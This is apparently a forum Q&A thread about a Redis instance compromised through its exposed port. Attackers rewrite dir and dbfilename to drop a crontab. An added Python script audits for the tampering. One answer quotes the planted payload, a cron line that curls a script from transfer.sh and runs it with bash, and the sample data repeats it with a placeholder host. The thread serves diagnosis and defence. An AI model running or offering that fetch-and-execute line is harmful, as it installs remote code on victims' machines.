
I have set up my redis-server so that CONFIG GET dir --> "/var/lib/redis" and CONFIG GET dbfilename --> "redis.rdb".

However, after my server has been running a few hours or a few days, I start getting the "Failed opening .rdb for saving: Permission denied" error.

If I then run CONFIG GET dir again, it returns "/var/spool/cron", and CONFIG GET dbfilename returns "root". I have tried looking all over the place for some kind of understanding of what is happening, but to no avail.

If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.

andy_roddam

3 Answers


This is indeed an attack. If you check your redis keys after this happens you will see a few "string" keys like this: "Backup1", "Backup2", "Backup3".

The value of these will be something like this:

"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"

This is meant to modify your crontab.

Bottom line is - don't have redis port opened to the world.

igorl
  • Just fell victim to this attack as well. Turns out I had DMZ on my router set to my machine's IP... Thanks! – Mario Tacke Jun 16 '18 at 00:32
  • I get exactly this only a few hours after rolling a new instance, and forgot to set the firewall first! The redis server is inside a docker container. What should I do other than trying to recreate the instance all over again? – Thắng Trần Xuân Aug 21 '20 at 10:23
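The tampering the answer describes (dir and dbfilename rewritten, "Backup" keys holding crontab lines, an unauthenticated listener on all interfaces) can be checked for from the data CONFIG GET and the string keys return. The script below is an added example, not code from the thread or from Redis; it works on plain dicts so it runs offline, and the sample data (including the placeholder URL) is constructed to mirror the thread. To use it against a live instance you would feed it the output of redis-py's config_get() and the string values of the keys.

```python
import re

# Directories where an attacker-chosen dbfilename turns the RDB dump into code
# execution: cron spools, SSH keys, web roots (the thread's case is /var/spool/cron).
SUSPECT_DIRS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/", "/var/www")
# A cron schedule line: five schedule fields (e.g. "*/2 * * * *") followed by a command.
CRON_LINE = re.compile(r"^\s*(?:[\d*/,-]+\s+){5}\S")


def audit_redis(config, keys, expected_dir="/var/lib/redis", expected_dbfilename="dump.rdb"):
    """Check CONFIG GET output and string keys for the tampering described in the thread.

    config: dict such as redis-py's r.config_get() returns (dir, dbfilename, bind, requirepass, ...)
    keys:   dict of key -> string value, e.g. {k: r.get(k) for k in r.keys()} on a small instance
    Returns a list of (severity, message) findings; an empty list means nothing suspicious.
    """
    findings = []
    current_dir = config.get("dir", "")
    current_file = config.get("dbfilename", "")
    if current_dir != expected_dir:
        severity = "critical" if current_dir.startswith(SUSPECT_DIRS) else "warning"
        findings.append((severity, f"dir is {current_dir!r}, expected {expected_dir!r}"))
    if current_file != expected_dbfilename:
        findings.append(("critical", f"dbfilename is {current_file!r}, expected {expected_dbfilename!r}"))
    # Unauthenticated listener on every interface: the precondition for the attack.
    bind = config.get("bind", "")
    if (not bind or "0.0.0.0" in bind) and not config.get("requirepass"):
        findings.append(("warning", "listening on all interfaces without requirepass"))
    # Planted keys whose value is a crontab entry (the "Backup1".."Backup3" pattern).
    for key, value in keys.items():
        if any(CRON_LINE.match(line) for line in value.splitlines()):
            findings.append(("critical", f"key {key!r} holds a cron-style line"))
    return findings


# Constructed sample data modelled on the thread; the URL is a placeholder, not the real one.
COMPROMISED_CONFIG = {"dir": "/var/spool/cron", "dbfilename": "root", "bind": "", "requirepass": ""}
COMPROMISED_KEYS = {
    "Backup1": "\t\n*/2 * * * * curl -s https://example.invalid/tmp.sh > .cmd && bash .cmd\n\t",
    "session:42": '{"user": "alice"}',
}
CLEAN_CONFIG = {"dir": "/var/lib/redis", "dbfilename": "redis.rdb", "bind": "127.0.0.1", "requirepass": "s3cret"}

if __name__ == "__main__":
    for sev, msg in audit_redis(COMPROMISED_CONFIG, COMPROMISED_KEYS, "/var/lib/redis", "redis.rdb"):
        print(f"[{sev}] {msg}")
    print("clean instance:", audit_redis(CLEAN_CONFIG, {"session:42": '{"user": "alice"}'}, "/var/lib/redis", "redis.rdb"))
```

A non-empty result is a reason to treat the host as compromised and rebuild it, not just to restart Redis, since the crontab written via the dump file survives a Redis restart.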

It seems as if this may just be a security issue. Out of the box redis is accessible via any IP address. As a simple first step to check that this was a security issue as suggested by @ItamarHaber, I simply bound the redis server to localhost and now the problem seems to have resolved itself. Here is a great article that helped me with this: A few things about Redis security

andy_roddam

This can be solved by restarting the VM, enabling the UFW firewall, and allowing only those IP addresses which are authorised to access it.